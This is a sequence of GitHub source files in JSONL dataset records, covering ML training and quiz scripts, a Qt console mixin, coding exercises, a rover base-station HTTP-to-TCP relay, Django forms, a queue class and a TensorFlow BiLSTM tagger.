dataset\n\n Returns:\n trainer(Trainer): Fine tuned trainer object\n '''\n # Define training arguments for fine tuning\n training_args = TrainingArguments(\n num_train_epochs=5,\n evaluation_strategy='epoch',\n per_device_eval_batch_size=16,\n per_device_train_batch_size=16,\n lr_scheduler_type='cosine_with_restarts',\n warmup_ratio=0.1,\n learning_rate=1e-3,\n save_total_limit=1,\n output_dir=paths.logs_directory_path + 'report_generation'\n )\n\n data_collator = DataCollatorForLanguageModeling(\n tokenizer=report_tokenizer,\n mlm=False\n )\n # Define trainer object for fine tuning blip conditional generation model\n trainer = Trainer(\n args=training_args,\n train_dataset=train,\n eval_dataset=valid,\n data_collator=data_collator,\n tokenizer=report_processor.tokenizer,\n model=self.model\n )\n # Train model\n trainer.train()\n\n return trainer\n\n","repo_name":"Ananya-AJ/Chest-Xray_Medical_Report_generation","sub_path":"Code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35513653150","text":"import pandas as pd\nimport numpy as np\nimport timeit\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.linear_model import Ridge \nfrom sklearn.linear_model import Lasso\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import cross_val_score \nfrom sklearn.metrics import mean_squared_error \nfrom sklearn.preprocessing import MinMaxScaler \nfrom sklearn.pipeline import make_pipeline \nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\npd.options.display.max_rows=None\npd.options.display.max_columns=None\npd.options.display.width= 175\n\n\ndf = pd.read_csv('/Users/user/Downloads/ML Analytics/ML Analytics - Course 3/social_honeypot_sample.csv')\n\ny = df['Polluter']\nX = df[['LengthOfDescriptionInUserProfile','LengthOfScreenName','NumberOfFollowings','NumberOfFollowers','NumberOfTweets']] # used for Question 7\n#X = df['Tweet'] # used for Question 8,9,10,11\n\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.25, random_state=25)\n\n\ndef Question_7():\n '''\n Create a logistic regression using the above features and default paramters (l2 penalty and C=1). What's the mean precision score from 10-fold cross-validation? Round to three decimal places.\n '''\n \n model = LogisticRegression(penalty='l2',C=1)\n \n val_scores = cross_val_score(model, X_train, y_train, scoring='precision', cv=10)\n \n print('Q7:', round(np.mean(val_scores),3)) # Correct: 0.889\nQuestion_7()\n\n\n\ndef Question_8():\n '''\n First, you'll take a simple bag of words approach. Create a logistic regression the training set with CountVectorizer(). Use default parameters. Conduct 10-fold cross-validation, using precision for scoring.\n\nWhat mean precision does this model get? Round to three decimal places.\n '''\n vectorizer = CountVectorizer()\n X_new = vectorizer.fit_transform(X_train) \n \n model = LogisticRegression()\n \n val_scores = cross_val_score(model, X_new, y_train, scoring='precision', cv=10)\n print('Q8: ', round(np.mean(val_scores),3)) # Correct: 0.749\n \n \nQuestion_8()\n\ndef question_9():\n '''\n Next, create a logistic model where you preprocess the data with TfidfVectorizer and then evaluate it with 10-fold cross validation. Recall that you may get an overly-optimistic evaluation if you use use the Tfidfvectorizer on all of X_train, and then conduct cross-validation on just the logistic regression. Instead, during cross-validation, you'll want to fit the vectorizer on just the trainng data, fit the regression on the training data, and then test it on the hold-out set.\n\n To do this, you'll need to create a pipeline with the vectorizer and the logistic regression, and conduct the cross-validation using the pipeline. To start with, again, use default parameters. What mean precision do you get? Round to three decimal places.\n '''\n \n tfidf_vectorizor = TfidfVectorizer()\n X_vector = tfidf_vectorizor.fit_transform(X_train)\n \n model = LogisticRegression().fit(X_vector, y_train) \n \n pipeline = make_pipeline(tfidf_vectorizor, model) #NOTE: My pipeline attributes were initially incorrect. I was passing the X_vector AND NOT the tfidf_vectorizor. Now the vectorizor is being passed.\n # https://stackoverflow.com/questions/58543937/how-to-save-tfidf-vectorizer-in-scikit-learn\n \n val_score = cross_val_score(pipeline, X_train, y_train, scoring='precision', cv=10)\n print('Q9: ', round(np.mean(val_score),3)) #Correct: 0.747\n \n \nquestion_9()\n\ndef question_10():\n '''\n Conduct a Grid Search to find the best values for these parameters. Use precision as the scoring method, but this time only do 5-fold cross-validation to help with the computation time.\n\n If you need to understand how the parameters in the parameter grid for the Grid Search need to be named, you can use my_grid_search.estimator.get_params().keys() for a list of the names of the parameters.\n\n What's the best score from the Grid Search? Round to three decimal places.\n '''\n start_time = timeit.default_timer()\n \n tfidf_vectorizor = TfidfVectorizer()\n \n model = LogisticRegression() # The model DOES NOT need to be fit PRIOR being fed into the pipeline. Fit before the pipeline only slows down the code. \n \n #parameters = {'tfidfvectorizer__max_df':(0.7,0.8,0.9,1.0),\n #'tfidfvectorizer__min_df':(1,5,10),\n #'tfidfvectorizer__ngram_range':[(1,1),(1,2)],\n #'tfidfvectorizer__use_idf':['True','False']}\n \n parameters = {'tfidfvectorizer__max_df':[0.7],\n 'tfidfvectorizer__min_df':[5],\n 'tfidfvectorizer__ngram_range':[(1,2)],\n 'tfidfvectorizer__use_idf':['True']} \n \n pipeline = make_pipeline(tfidf_vectorizor, model) #NOTE: My pipeline attributes were initially incorrect. I was passing the X_vector AND NOT the tfidf_vectorizor. Now the vectorizor is being passed.\n # https://stackoverflow.com/questions/58543937/how-to-save-tfidf-vectorizer-in-scikit-learn \n #print(pipeline.get_params().keys())\n \n grid_search = GridSearchCV(estimator=pipeline, param_grid=parameters , scoring='precision', cv=5)\n grid_search.fit(X_train, y_train)\n X_tweet = pd.Series(['Everything is getting better. http://bit.ly/6DcsUR'])\n print('Q10: ', round(grid_search.best_score_,3))\n print('Q11: ', grid_search.best_estimator_.steps)\n print('Q12: ', grid_search.predict_proba(X_tweet))\n \n print('Total time: ', timeit.default_timer() - start_time)\n #Correct: Q10: 0.753\n #Correct: Q11: [('tfidfvectorizer', TfidfVectorizer(max_df=0.7, min_df=5, ngram_range=(1, 2), use_idf='True')), ('logisticregression', LogisticRegression())]\n #Correct: Q12: [[0.42529456 0.57470544]]\n \nquestion_10()\n'''\nQ8: 0.749\nQ9: 0.747\nQ10: 0.753\nQ11: [('tfidfvectorizer', TfidfVectorizer(max_df=0.7, min_df=5, ngram_range=(1, 2), use_idf='True')), ('logisticregression', LogisticRegression())]\nQ12: [[0.42529456 0.57470544]]\nTotal time: 1.4935354730000006\n'''\n\n\n\n","repo_name":"dervinfro/Machine-Learning-Analytics","sub_path":"MLA_Course_3_Week_3_QUIZ_Part_2.py","file_name":"MLA_Course_3_Week_3_QUIZ_Part_2.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13864616409","text":"from utils.pixmapcache import getIcon\nfrom utils.runparams import RUN, PROFILE, DEBUG\nfrom .qt import QApplication, QCursor, Qt, QTabBar\n\n\nclass MainWindowRedirectedIOMixin:\n\n \"\"\"Main window redirected IO mixin\"\"\"\n\n def __init__(self):\n self.redirectedIOConsole = None\n self.__newRunIndex = -1\n self.__newProfileIndex = -1\n self.__newDebugIndex = -1\n\n def _initRedirectedIO(self):\n \"\"\"Connects the signals etc.\"\"\"\n # The only redirected IO consoles are cloasable\n self._bottomSideBar.sigTabCloseRequested.connect(self.__onCloseRequest)\n\n def __onCloseRequest(self, index):\n \"\"\"User wants to close a redirected IO console\"\"\"\n self._bottomSideBar.removeTab(index)\n\n def __getNewRunIndex(self):\n \"\"\"Provides the new run index\"\"\"\n self.__newRunIndex += 1\n return self.__newRunIndex\n\n def __getNewProfileIndex(self):\n \"\"\"Provides the new profile index\"\"\"\n self.__newProfileIndex += 1\n return self.__newProfileIndex\n\n def __getNewDebugIndex(self):\n \"\"\"Provides a new debug console index\"\"\"\n self.__newDebugIndex += 1\n return self.__newDebugIndex\n\n def __getCaptionNameTooltip(self, kind):\n \"\"\"Provides the tab caption, name and tooltip\"\"\"\n if kind == PROFILE:\n index = str(self.__getNewProfileIndex())\n return ('Profiling #' + index, 'profiling#' + index,\n 'Redirected IO profile console #' + index + ' (running)')\n if kind == RUN:\n index = str(self.__getNewRunIndex())\n return ('Run #' + index, 'running#' + index,\n 'Redirected IO run console #' + index + ' (running)')\n index = str(self.__getNewDebugIndex())\n return ('Debug #' + index, 'debugging#' + index,\n 'Redirected IO debug console #' + index + ' (running)')\n\n def addIOConsole(self, widget, consoleType):\n \"\"\"Installs a new widget at the bottom\"\"\"\n if consoleType not in [RUN, PROFILE, DEBUG]:\n raise Exception('Undefined redirected IO console type')\n\n caption, name, tooltip = self.__getCaptionNameTooltip(consoleType)\n\n widget.sigKillIOConsoleProcess.connect(self.__onKillIOConsoleProcess)\n widget.sigSettingsUpdated.connect(self.onIOConsoleSettingsUpdated)\n\n self._bottomSideBar.addTab(\n widget, getIcon('ioconsole.png'), caption, name, None)\n self._bottomSideBar.tabButton(widget, QTabBar.RightSide).hide()\n self._bottomSideBar.setTabToolTip(name, tooltip)\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab(name)\n self._bottomSideBar.raise_()\n widget.setFocus()\n\n def __onKillIOConsoleProcess(self, procuuid):\n \"\"\"Kills the process linked to the IO console\"\"\"\n self._runManager.kill(procuuid)\n\n def onIOConsoleSettingsUpdated(self):\n \"\"\"Initiates updating all the IO consoles settings\"\"\"\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, 'procuuid'):\n if hasattr(widget, 'consoleSettingsUpdated'):\n widget.consoleSettingsUpdated()\n index -= 1\n\n def __onClientStdout(self, data):\n \"\"\"Triggered when the client reports stdout\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.appendStdoutMessage(data)\n\n def __onClientStderr(self, data):\n \"\"\"Triggered when the client reports stderr\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.appendStderrMessage(data)\n\n def __ioconsoleIDEMessage(self, message):\n \"\"\"Sends an IDE message to the IO console\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.appendIDEMessage(message)\n\n def __onClientRawInput(self, prompt, echo):\n \"\"\"Triggered when the client input is requested\"\"\"\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab('ioredirect')\n self._bottomSideBar.raise_()\n self.redirectedIOConsole.rawInput(prompt, echo)\n self.redirectedIOConsole.setFocus()\n\n def __onUserInput(self, userInput):\n \"\"\"Triggered when the user finished input in the redirected IO tab\"\"\"\n self.__debugger.remoteRawInput(userInput)\n\n def updateIOConsoleTooltip(self, procuuid, msg):\n \"\"\"Updates the IO console tooltip\"\"\"\n index = self.__getIOConsoleIndex(procuuid)\n if index is not None:\n tooltip = self._bottomSideBar.tabToolTip(index)\n tooltip = tooltip.replace(\"(running)\", \"(\" + msg + \")\")\n self._bottomSideBar.setTabToolTip(index, tooltip)\n\n def __getIOConsoleIndex(self, procuuid):\n \"\"\"Provides the IO console index by the thread ID\"\"\"\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, \"procuuid\"):\n if widget.procuuid == procuuid:\n return index\n index -= 1\n return None\n\n def __onCloseIOConsole(self, procuuid):\n \"\"\"Closes the tab with the corresponding widget\"\"\"\n index = self.__getIOConsoleIndex(procuuid)\n if index is not None:\n self._bottomSideBar.removeTab(index)\n\n def closeAllIOConsoles(self):\n \"\"\"Closes all IO run/profile tabs and clears the debug IO console\"\"\"\n QApplication.setOverrideCursor(QCursor(Qt.WaitCursor))\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, 'procuuid'):\n if hasattr(widget, \"stopAndClose\"):\n widget.stopAndClose()\n index -= 1\n QApplication.restoreOverrideCursor()\n\n def getIOConsoles(self):\n \"\"\"Provides a list of the current IO consoles\"\"\"\n consoles = []\n index = self._bottomSideBar.count - 1\n while index >= 0:\n widget = self._bottomSideBar.widget(index)\n if hasattr(widget, 'procuuid'):\n consoles.append(widget)\n index -= 1\n return consoles\n\n def onReuseConsole(self, widget, kind):\n \"\"\"Called when a console is reused\"\"\"\n caption, name, tooltip = self.__getCaptionNameTooltip(kind)\n self._bottomSideBar.tabButton(widget, QTabBar.RightSide).hide()\n self._bottomSideBar.updateTabName(widget, name)\n self._bottomSideBar.setTabText(widget, caption)\n self._bottomSideBar.setTabToolTip(widget, tooltip)\n self._bottomSideBar.show()\n self._bottomSideBar.setCurrentTab(widget)\n self._bottomSideBar.raise_()\n widget.setFocus()\n\n def onConsoleFinished(self, widget):\n \"\"\"Triggered when a process finished one way or another\"\"\"\n self._bottomSideBar.tabButton(widget, QTabBar.RightSide).show()\n","repo_name":"SergeySatskiy/codimension","sub_path":"codimension/ui/mainredirectedio.py","file_name":"mainredirectedio.py","file_ext":"py","file_size_in_byte":7251,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"54"} +{"seq_id":"14884422371","text":"\nfrom itertools import combinations\ndef pair_sum(lst, k):\n\n if len(lst) < 2:\n print('Array is too small')\n \n numbers = list(combinations(lst, 2))\n print(numbers)\n\n for group in numbers:\n if sum(group) == k:\n\n print(group)\n\n# pair_sum([1,3,2,2,5], 6)\n\ndef pair_sum2(array, k):\n \n if len(array) < 2:\n print('Array is too small')\n \n seen = set()\n output = set()\n\n for num in array:\n\n target = k - num\n\n if target not in seen:\n seen.add(num)\n\n else:\n output.add((min(num, target), max(num, target)))\n\n for i in list(output):\n print(i)\n\npair_sum2([1,3,2,2], 4)\n\n\n\n\ndef largest_sum(array):\n\n if len(array) == 0:\n return print('array too small')\n\n max_sum = array[0]\n current_sum = array[0]\n\n for num in array[1:]:\n current_sum = max(current_sum + num, num)\n max_sum = max(current_sum, max_sum)\n \n return max_sum\n\n\n# print(largest_sum([7,1,2,-1,3,4,10,-12,3,21,-19]))\n\n\n\ndef reverse_string(string):\n\n l = string.split(' ')\n\n alist = reversed(l)\n\n print(' '.join(alist))\n\n \n\n\n# reverse_string('This is the best')\n\ndef rotation(l1, l2):\n\n if len(l1) != len(l2):\n return False\n\n key = l1[0]\n key_index = 0\n\n for i in range(len(l2)):\n if l2[i] == key:\n key_index = i\n \n break\n\n if key_index == 0:\n return False\n\n for x in range(len(l1)):\n l2index = (key_index + x) % len(l1)\n\n if l1[x] != l2[l2index]:\n return False\n\n return True\n \n# print(rotation([1,2,3,4,5,6,7], [4,5,6,7,1,2,3]))\n\ndef commonElements(l1, l2):\n\n alist = []\n\n for i in l1:\n for j in l2:\n if i == j:\n alist.append(i)\n \n return alist\n\nprint(commonElements([1,3,4,6,7,9], [1,2,4,5,9,10]))\n ","repo_name":"Kalkulus1/python-recap","sub_path":"random_tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3639280875","text":"n_epochs = 5\nlr = 0.01\nn_folds = 5\nlstm_input_size = 32\nhidden_state_size = 256\nn_layers = 2\ndropout = 0.125\nbidirectional = True\nbatch_size = 64\nnum_sequence_layers = 2\noutput_dim = 2 # !!!!!!!!!!!!!!!!!!!!!!!!\nnum_time_steps = 30 # !!!!!!!!!!!!!!\nrnn_type = 'LSTM'","repo_name":"NienkeWessel/ThesisCS","sub_path":"global_variables.py","file_name":"global_variables.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40927772976","text":"# I promise I'll document all of this later!\n# - Waverly Sonntag\nfrom http.server import SimpleHTTPRequestHandler, BaseHTTPRequestHandler, HTTPServer\nimport time\nfrom os.path import exists, splitext\nimport socket\n\nweb_host_name = \"localhost\" # is genuinely localhost\nweb_port = 8081\n\ntcp_port = 8082\ntcp_host_name = \"192.168.1.123\" # would be the Jetson's hardcoded IP address\n\n\nclass my_server(BaseHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/':\n self.path = '/index.html'\n existy = exists('frontend' + self.path)\n if (existy):\n self.send_response(200)\n exty = splitext(self.path)[1]\n if (exty == '.html'):\n self.send_header(\"Content-type\", \"text/html\")\n elif (exty == '.svg'):\n self.send_header(\"Content-type\", \"image/svg+xml\")\n elif (exty == '.css'):\n self.send_header(\"Content-type\", \"text/css\")\n elif (exty == '.js'):\n self.send_header(\"Content-type\", \"text/javascript\")\n else:\n self.send_header(\"content-type\", \"application/octet-stream\")\n self.end_headers()\n f = open('frontend' + self.path, 'r')\n self.wfile.write(bytes(f.read(), 'utf-8'))\n else:\n self.send_response(404)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(bytes('404', 'utf-8'))\n def do_POST(self):\n if (self.path.startswith(\"/reportstate\")):\n tcp_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"TCP client initialized.\")\n # make TCP connection\n try:\n tcp_client.connect((tcp_host_name, tcp_port))\n tcp_client.sendall(bytes(self.rfile.read(int(self.headers['Content-Length'])).decode('utf-8'), 'utf-8'))\n\n received = tcp_client.recv(1024)\n except Exception as e:\n received = '!'.encode()\n print(e)\n finally:\n tcp_client.close()\n print(\"TCP session done\")\n\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(bytes(received.decode(), 'utf-8'))\n #self.wfile.write(bytes(self.rfile.read(int(self.headers['Content-Length'])).decode('utf-8'), 'utf-8'))\n else:\n self.send_response(404)\n self.send_header(\"Content-type\", \"text/plain\")\n self.end_headers()\n self.wfile.write(bytes(\"404\", \"utf-8\"))\n\nif __name__ == \"__main__\":\n web_server = HTTPServer((web_host_name, web_port), my_server)\n print(\"HTTP server started http://%s:%s\" % (web_host_name, web_port))\n\n try:\n web_server.serve_forever()\n except KeyboardInterrupt:\n pass\n\n web_server.server_close()\n print(\"Webserver stopped.\")\n","repo_name":"NIURoverTeam/communications","sub_path":"if_webserver_basestation.py","file_name":"if_webserver_basestation.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18583538217","text":"from crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Submit\nfrom django import forms\nfrom django.urls import reverse\n\nfrom main.models import WorkOrder, Client, Site, Manufacturer, Part, LineItem\n\n\nclass WorkOrderForm(forms.ModelForm):\n class Meta:\n model = WorkOrder\n fields = ['title', 'scope', 'client', 'site', 'status']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass ClientForm(forms.ModelForm):\n class Meta:\n model = Client\n fields = ['name', 'slug']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass SiteForm(forms.ModelForm):\n class Meta:\n model = Site\n fields = ['client', 'site_name', 'slug', 'address', 'note']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass ManufacturerForm(forms.ModelForm):\n class Meta:\n model = Manufacturer\n fields = ['name', 'slug', 'note']\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass PartForm(forms.ModelForm):\n class Meta:\n model = Part\n fields = ['manufacturer', 'name', 'description', 'cost', 'note', 'link', ]\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.add_input(Submit('submit', 'Submit'))\n\n\nclass LineItemForm(forms.ModelForm):\n class Meta:\n model = LineItem\n fields = [\n 'part',\n 'description',\n 'location',\n 'quantity',\n 'cost',\n 'extended_cost',\n 'source',\n 'note',\n 'item_price',\n ]\n\n def __init__(self, work_order_id, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_action = reverse('workorders_add_line_item', kwargs={'pk': work_order_id})\n # print(self.instance)\n # if self.instance:\n # self.helper.add_input(Submit('submit', 'Save'))\n # else:\n self.helper.add_input(Submit('submit', 'Create'))\n","repo_name":"kpavlovsky/joeyadmin","sub_path":"main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71025039841","text":"from threading import Thread, ThreadError\nimport sys,os\nimport time\nimport random\n\ndef insert(array,queue,rightIndex,value):\n i = rightIndex\n while (i >= 0 and queue[array[i]][0] > value):\n array[i+1] = array[i]\n i-=1\n array[i+1] = value\n\ndef insertion_sort(queue,array):\n for i in range(1,len(array)):\n insert(array,i-1, queue[array[i]][0])\n return array\n\n\nclass Queue:\n def __init__(self):\n self.memory = dict()\n self.wait_queue = list()\n self.isPriority = False\n def put(self,c):\n try:\n self.memory[c.token] = (c.priority, c)\n if self.isPriority:\n self.wait_queue.append(c.token)\n # Percorre a fila para verificar se\n # o novo cliente tem maior prioridade\n self.wait_queue = insertion_sort(self.memory, self.wait_queue)\n # print (self.wait_queue, self.memory)\n else:\n self.wait_queue.append(c.token)\n return True\n except Exception as err:\n print(\"Fila\",err)\n return False\n def get(self, token):\n return self.memory[token]\n def front(self):\n return self.wait_queue[0]\n def size (self):\n return len(self.memory)\n def getQueue(self):\n return self.memory\n def remove(self,token):\n try:\n del(self.memory[token])\n self.wait_queue.remove(token)\n return True\n except Exception as err:\n print(err)\n return False\n","repo_name":"AnaHauachen/Queue-Data-Structure","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27495357511","text":"from __future__ import print_function\nfrom __future__ import division\nimport tensorflow as tf\nfrom src.utils import tf_utils\n\n\nclass BiLSTMChar(object):\n \"\"\"\n A bidirectional LSTM for embedding tokens.\n \"\"\"\n\n def __init__(self, char_domain_size, char_embedding_dim, hidden_dim, embeddings=None):\n \"\"\"\n Initializing a Bi-LSTM layer for character embedding of a word\n :param char_domain_size:\n :param char_embedding_dim:\n :param hidden_dim:\n :param embeddings:\n \"\"\"\n ################################################################################\n # Initializing the object variables\n ################################################################################\n # Domain size if the characters : NUmber of unique characters\n self.char_domain_size = char_domain_size\n # Size of the embedding\n self.embedding_size = char_embedding_dim\n # Size of the hidden dimension\n self.hidden_dim = hidden_dim\n # Size of the output: double of the hidden dimension\n self.output_size = 2 * self.hidden_dim\n\n print(\"Bi-LSTM char embedding model\")\n print(\"embedding dim: \", self.embedding_size)\n print(\"out dim: \", self.output_size)\n\n ################################################################################\n # Initializing the TensorFlow variables\n ################################################################################\n\n # PLACEHOLDERS\n # char embedding input\n self.input_chars = tf.placeholder(tf.int64, [None, None], name=\"input_chars\")\n # batch size\n self.batch_size = tf.placeholder(tf.int32, None, name=\"batch_size\")\n # Max number of words in a sentence\n self.max_seq_len = tf.placeholder(tf.int32, None, name=\"max_seq_len\")\n # Max length of a token\n self.max_tok_len = tf.placeholder(tf.int32, None, name=\"max_tok_len\")\n # dropout probabilities\n self.input_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"input_dropout_keep_prob\")\n # sequence lengths for each sentence\n self.sequence_lengths = tf.placeholder(tf.int32, [None, None], name=\"sequence_lengths\")\n # token length of all tokens in a sentence\n self.token_lengths = tf.placeholder(tf.int32, [None, None], name=\"tok_lengths\")\n # Embedding layer\n shape = (char_domain_size - 1, self.embedding_size)\n self.char_embeddings = tf_utils.initialize_embeddings(shape, name=\"char_embeddings\", pretrained=embeddings)\n\n ################################################################################\n # Processing the forward layer\n ################################################################################\n self.outputs = self.forward(self.input_chars, self.input_dropout_keep_prob, reuse=False)\n\n def forward(self, input_chars, input_dropout_keep_prob, reuse=True):\n \"\"\"\n Computing the forward pass of the network\n :param input_chars:\n :param input_dropout_keep_prob:\n :param reuse:\n :return:\n \"\"\"\n with tf.variable_scope(\"char-forward\", reuse=reuse):\n char_embeddings_lookup = tf.nn.embedding_lookup(self.char_embeddings, input_chars)\n char_embeddings_flat = tf.reshape(char_embeddings_lookup, tf.stack(\n [self.batch_size * self.max_seq_len, self.max_tok_len, self.embedding_size]))\n tok_lens_flat = tf.reshape(self.token_lengths, [self.batch_size * self.max_seq_len])\n input_feats_drop = tf.nn.dropout(char_embeddings_flat, input_dropout_keep_prob)\n with tf.name_scope(\"char-bilstm\"):\n fwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n bwd_cell = tf.contrib.rnn.BasicLSTMCell(self.hidden_dim, state_is_tuple=True)\n lstm_outputs, _ = tf.nn.bidirectional_dynamic_rnn(cell_fw=fwd_cell, cell_bw=bwd_cell, dtype=tf.float32,\n inputs=input_feats_drop,\n parallel_iterations=32, swap_memory=False,\n sequence_length=tok_lens_flat)\n outputs_fw = lstm_outputs[0]\n outputs_bw = lstm_outputs[1]\n # this is batch*output_size (flat)\n fw_output = tf_utils.last_relevant(outputs_fw, tok_lens_flat)\n # this is batch * max_seq_len * output_size\n bw_output = outputs_bw[:, 0, :]\n hidden_outputs = tf.concat(axis=1, values=[fw_output, bw_output])\n hidden_outputs_unflat = tf.reshape(hidden_outputs,\n tf.stack([self.batch_size, self.max_seq_len, self.output_size]))\n return hidden_outputs_unflat\n\n\nclass BiLSTM(object):\n \"\"\"\n A bidirectional LSTM for text classification.\n This class implements a BiLSTM layer as described in the paper : https://arxiv.org/pdf/1508.01991.pdf\n \"\"\"\n\n def __init__(self, num_classes, vocab_size, shape_domain_size, char_domain_size, char_size,\n embedding_size, shape_size, nonlinearity, viterbi, hidden_dim, char_embeddings, embeddings=None):\n\n \"\"\"\n Initializing a BiLSTM layer with parameters\n :param num_classes:\n :param vocab_size:\n :param char_domain_size:\n :param char_size:\n :param embedding_size:\n :param shape_size:\n :param nonlinearity:\n :param viterbi:\n :param hidden_dim:\n :param char_embeddings:\n :param embeddings:\n \"\"\"\n ################################################################################\n # Initializing the object variables\n ################################################################################\n # Number of output classes : In our case number of distinct labels\n self.num_classes = num_classes\n # Maximum character size in a word token : Used for padding and boolean masking\n self.char_size = char_size\n # Character embeddings of the word\n self.char_embeddings = char_embeddings\n # Dimension of word embedding : Useful when there is no pre-trained word embedding\n self.embedding_size = embedding_size\n # Dimension of the hidden layer of the LSTM\n self.hidden_dim = hidden_dim\n # Type of non-linear function used\n self.nonlinearity = nonlinearity\n # Boolean flag to determine if CRF is to be used\n self.viterbi = viterbi\n # Vocab size\n self.vocab_size = vocab_size\n # Shape domain size\n self.shape_domain_size = shape_domain_size\n # Shape Size\n self.shape_size = shape_size\n # Whether we need to use character embeddings as input\n self.use_characters = self.char_size != 0\n # Whether we need to use shape embeddings as input\n self.use_shape = self.shape_size != 0\n # Declaring the word embedding shape\n self.word_embeddings_shape = (vocab_size - 1, embedding_size)\n ################################################################################\n # Initializing the TensorFlow variables\n ################################################################################\n\n # PLACEHOLDERS\n # word embedding input : 2-D int matrix\n self.input_x1 = tf.placeholder(tf.int64, [None, None], name=\"input_x1\")\n # shape embedding input\n self.input_x2 = tf.placeholder(tf.int64, [None, None], name=\"input_x2\")\n # labels : 2-D int matrix\n self.input_y = tf.placeholder(tf.int64, [None, None], name=\"input_y\")\n # padding mask\n self.input_mask = tf.placeholder(tf.float32, [None, None], name=\"input_mask\")\n # Batch size\n self.batch_size = tf.placeholder(tf.int32, None, name=\"batch_size\")\n # Maximum sequence length\n self.max_seq_len = tf.placeholder(tf.int32, None, name=\"max_seq_len\")\n # sequence lengths padded with zeros\n self.sequence_lengths = tf.placeholder(tf.int32, [None, None], name=\"sequence_lengths\")\n # dropout and l2 penalties\n self.middle_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"middle_dropout_keep_prob\")\n self.hidden_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"hidden_dropout_keep_prob\")\n self.input_dropout_keep_prob = tf.placeholder_with_default(1.0, [], name=\"input_dropout_keep_prob\")\n self.l2_penalty = tf.placeholder_with_default(0.0, [], name=\"l2_penalty\")\n self.projection = tf.placeholder_with_default(False, [], name=\"projection\")\n self.drop_penalty = tf.placeholder_with_default(0.0, [], name=\"drop_penalty\")\n\n # CONSTANTS\n # Keeping track of l2 regularization loss (optional)\n self.l2_loss = tf.constant(0.0)\n # set the pad token to a constant 0 vector\n self.word_zero_pad = tf.constant(0.0, dtype=tf.float32, shape=[1, embedding_size])\n self.shape_zero_pad = tf.constant(0.0, dtype=tf.float32, shape=[1, shape_size])\n self.char_zero_pad = tf.constant(0.0, dtype=tf.float32, shape=[1, char_size])\n # Declaring transition probabilities to use when it is CRF\n if self.viterbi:\n self.transition_params = tf.get_variable(\"transitions\", [num_classes, num_classes])\n # Initializing Word-Embedding layer\n self.w_e = tf_utils.initialize_embeddings(self.word_embeddings_shape, name=\"w_e\", pretrained=embeddings)\n\n # Since 0 is padding : calculating non-zero values for masking\n nonzero_elements = tf.not_equal(self.sequence_lengths, tf.zeros_like(self.sequence_lengths))\n count_nonzero_per_row = tf.reduce_sum(tf.to_int32(nonzero_elements), axis=1)\n self.flat_sequence_lengths = tf.add(tf.reduce_sum(self.sequence_lengths, 1),\n tf.scalar_mul(2, count_nonzero_per_row))\n\n # Calling the forward layer\n self.unflat_scores, self.hidden_layer = 